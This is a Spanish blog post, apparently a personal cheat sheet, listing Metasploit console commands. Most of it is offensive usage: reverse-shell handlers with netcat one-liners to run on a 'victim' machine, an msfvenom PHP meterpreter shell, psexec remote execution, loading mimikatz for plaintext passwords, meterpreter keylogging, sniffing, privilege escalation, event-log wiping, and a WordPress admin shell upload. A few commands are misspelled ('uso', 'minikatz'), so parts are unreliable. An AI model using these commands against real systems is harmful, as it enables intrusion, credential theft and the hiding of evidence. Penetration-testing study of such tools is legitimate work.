Esta web utiliza cookies para proporcionarte la mejor experiencia de navegación posible. Estas cookies son guardadas en tu navegador y cumplen funciones como reconocerte cuando regresas a esta web y ayudarnos a saber qué secciones de la web encuentras más interesantes y útiles.
Comandos básicos para la consola de metasploit
- mayo 16, 2019
- Categoría: HE
Importante: Esta información es para uso lúdico personal. En ningún caso se pretende dar conocimientos, consejos, formaciones, herramientas, ni soluciones técnicas de ámbito comercial ni profesional. Simplemente es información que se ha redactado en finalidad de recordatorio de ciertos proyectos realizados. Si usted no está seguro de la fiabilidad de la información, no cumple con sus expectativas o no es de su agrado, le ruego que abandone este sitio web. Para ver todas las exclusiones garantía y de responsabilidad acceda a la sección Aviso Legal.
Metasploit es un framework para la explotación de vulnerabilidades que pertenece a la empresa Rapid7. Entre sus variantes de funcionamiento, aquí se detallan los comandos básicos para su modo consola.
Actualizar Metasploit
msfupgrade
Entrar en modo consola
msfconsole
Ayuda
help
Buscar playload, exploit, auxiliars, …
search name
Buscar por CVE
search CVE:2014-3245
Información de un playload, exploit, auxiliar, …
info name
Uso de un playload, exploit, auxiliar, …
uso name
Mostrar opciones del playload, exploit, auxiliar, …
show options
Volver atras
back
Asignar una variable, por ejemplo, RHOST
set RHOST 192.168.1.1
Asignar una variable global, por ejemplo, RHOST
setg RHOST 192.168.1.1
Estado de la base de datos
db_status
Uso de la base de datos para guardar información
msfdb init db_connect -y /usr/share/metasploit-framework/config/database.yml
Ver la tabla de hosts
hosts
Ver la tabla de puertos
services
Ver la tabla de credenciales
creds
Buscar un elemento en una tabla, por ejemplo, linux en hosts.
hosts -L linux
Borrar un elemento de una tabla, por ejemplo, en hosts
hosts -d 3
Importar un escaneo de nmap en formato xml
db_import /root/nmap.xml
Lanzar un escaneo con nmap dentro de metasploit
db_nmap -sT -p- -sV -O 192.168.1.1
Contraseñas en texto plano
load minikatz
Ejecutar comandos pc remoto con psexec.
use exploit/windows/smb/psexec # rhost, smbpass, smbuser
Abrir un puerto para conexión reversa
use exploit/multi/handler set LPORT 4444 set LHOST 192.168.2.100 exploit
Abrir un puerto para conexión reversa y conectarse con a él con nc (LINUX)
# Maquina local use exploit/multi/handler set LPORT 4444 set LHOST 192.168.2.100 set PAYLOAD linux/x64/shell/reverse_tcp exploit # Ejecutar en máquina remota (víctima) via webshell o similar. nc 192.168.2.100 4444 -e /bin/bash
Abrir un puerto para conexión reversa y conectarse con a él con nc (WINDOWS)
# Maquina local use exploit/multi/handler set LPORT 4444 set LHOST 192.168.2.100 set PAYLOAD windows/shell/reverse_tcp exploit # Ejecutar en máquina remota (víctima) via webshell o similar. nc.exe 192.168.2.100 4444 -e cmd.exe
Convertir una conexión establecido tipo shell a meterpreter.
use post/multi/manage/shell_to_meterpreter
Crear una shell reverse php para meterpreter
msfvenom -p php/meterpreter/reverse_tcp LHOST=XXX LPORT=YYY -f raw -o s.php
Abrir socket para conexión reversa para la shell php meterpreter
use exploit/multi/handler set LPORT 4444 set LHOST 192.168.2.100 set PAYLOAD php/meterpreter/reverse_tcp exploit
Módulo auxiliar para realizar un escaneo.
use auxiliary/scanner/portscan/syn
Módulo auxiliar de análisis de versiones SMB
use auxiliary/scanner/smb/smb_version
Módulo auxiliar de análisis de FTP anónimos.
use auxiliary/scanner/ftp/anonymous
Cargar un payload en un exploit para abrir una shell.
set PAYLOAD windows/shell/bind_tcp set PAYLOAD windows/shell/reverse_tcp
Cargar un payload en un exploit para abrir una session meterpreter
set PAYLOAD windows/meterpreter/bind_tcp set PAYLOAD windows/meterpreter/reverse_tcp
Meterpreter
# básico > sysinfo # muestra información básica del sistema. > reg -h # modificar claves del registro. > cd # cambio de dir. > cat # mostrar contenido fichero. > upload # subir ficheros. > download # descargar archivo. > ps # lista de procesos. > getpid # proceso que estamos ejecutando. > kill # matar procesos. > execute # executar procesos. > ipconfig # mostrar interfaces de red > idletime # muestra el tiempo que hace de la ultima interacción del usuario. > background # enviar sesión en background. > sessions -l # listar sesiones abiertas > sessions -i ID # usar una session. > search -f *.pdf # listar todos los archivos pdf. > search -d c:\\temp # buscar en la destinación especificada. # escalar privilegios. > getuid > getsystem > migrate PID > run scraper > run winenum > run credcollect > run getcountermeasure > run remotewinenum # sniffer > sniffer_interfaces > sniffer_start id_interfaces > sniffer_stats > sniffer_stop > sniffer_dump # keylogger > keyscan_start > keyscan_dump > keyscan_stop > screenshot # borrar logs run event_manager -i run event_manager -c # borra todos los logs. clearev # borra todos los logs.
Subir una shell en un wordpress usando Metasploit.
use exploit/unix/webapp/wp_admin_shell_upload set rhosts 192.168.1.10 set targeturi /wp set username yyy set password xxx exploit